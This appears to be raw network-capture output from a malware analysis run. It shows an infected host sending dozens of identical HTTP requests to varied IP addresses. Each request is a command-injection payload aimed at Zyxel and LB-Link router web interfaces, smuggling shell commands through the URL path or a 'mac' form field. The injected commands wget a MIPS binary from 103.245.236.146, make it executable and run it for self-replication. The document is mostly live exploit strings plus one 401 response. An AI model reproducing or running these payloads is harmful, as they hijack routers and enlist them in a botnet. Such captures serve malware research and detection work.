                                                Jan 28, 2024 10:16:28.868885040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5371192.168.2.2351084110.238.30.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868921041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5372192.168.2.235467817.130.80.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868959904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5373192.168.2.235433097.58.30.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868963003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5374192.168.2.2359942107.36.255.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868977070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5375192.168.2.235229078.106.131.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869009018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5376192.168.2.235896835.84.251.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869028091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5377192.168.2.233418642.105.210.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869071960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5378192.168.2.2359870206.250.39.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869079113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5379192.168.2.234130043.113.114.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869112015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5380192.168.2.236063270.199.66.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869142056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5381192.168.2.234687212.12.53.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869174004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5382192.168.2.2334048151.80.122.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869209051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5383192.168.2.2358426207.99.117.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869244099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5384192.168.2.234771890.138.163.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869273901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5385192.168.2.236070477.94.42.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869306087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5386192.168.2.2334108133.132.135.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869333029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5387192.168.2.2335988222.107.10.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869354010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5388192.168.2.2343218190.34.24.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869360924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5389192.168.2.234786025.183.18.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869457960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5390192.168.2.2335018209.33.214.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869488001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5391192.168.2.234618474.19.220.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869501114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5392192.168.2.2339030196.181.0.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869522095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5393192.168.2.233458212.172.93.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869539022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5394192.168.2.234450484.9.71.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869592905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5395192.168.2.2339866165.1.250.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869612932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5396192.168.2.2347920173.40.223.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869625092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5397192.168.2.2346490184.204.140.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869653940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5398192.168.2.234227640.117.39.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869682074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5399192.168.2.2352214117.131.213.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869699001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5400192.168.2.23455708.55.5.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869755983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5401192.168.2.235251269.225.243.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869757891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5402192.168.2.233488072.64.173.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869813919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5403192.168.2.2341388132.189.198.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869836092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5404192.168.2.2351014162.147.59.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869857073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5405192.168.2.233527659.218.50.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869875908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5406192.168.2.2346740112.24.35.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.869894981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5407192.168.2.235420293.62.95.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.873043060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5408192.168.2.2345510160.234.251.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.873203993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5409192.168.2.2339488122.169.41.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.873224974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5410192.168.2.2347946195.60.71.578080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.962446928 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:29.204899073 CET452INHTTP/1.1 401 Unauthorized
                                                Date: Sun, 28 Jan 2024 09:16:18 GMT
                                                Server: Boa/0.94.14rc21
                                                Accept-Ranges: bytes
                                                Content-encoding: gzip
                                                Connection: close
                                                WWW-Authenticate: Basic realm="WF2780"
                                                user"
                                                Content-Type: text/html; charset=ISO-8859-1
                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /goform/set_LimitClient_cfg from this server.</BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5411192.168.2.23491922.160.28.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879144907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5412192.168.2.234022671.119.216.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879174948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5413192.168.2.2337658203.45.39.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879189968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5414192.168.2.23478444.33.110.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879230976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5415192.168.2.235354219.157.222.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879250050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5416192.168.2.2337592104.227.114.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879271030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5417192.168.2.2350606139.202.63.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879303932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5418192.168.2.2334314185.245.37.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879322052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5419192.168.2.2354180192.1.35.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879355907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5420192.168.2.2334910121.236.243.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879375935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5421192.168.2.2348978168.145.167.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879391909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5422192.168.2.2338590179.90.223.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879425049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5423192.168.2.2345466210.239.71.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879441977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5424192.168.2.234374447.23.91.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879463911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5425192.168.2.2360900177.116.71.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879483938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5426192.168.2.234821419.157.234.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.879513025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5427192.168.2.2355806160.199.152.92443
                                                TimestampBytes transferredDirectionData
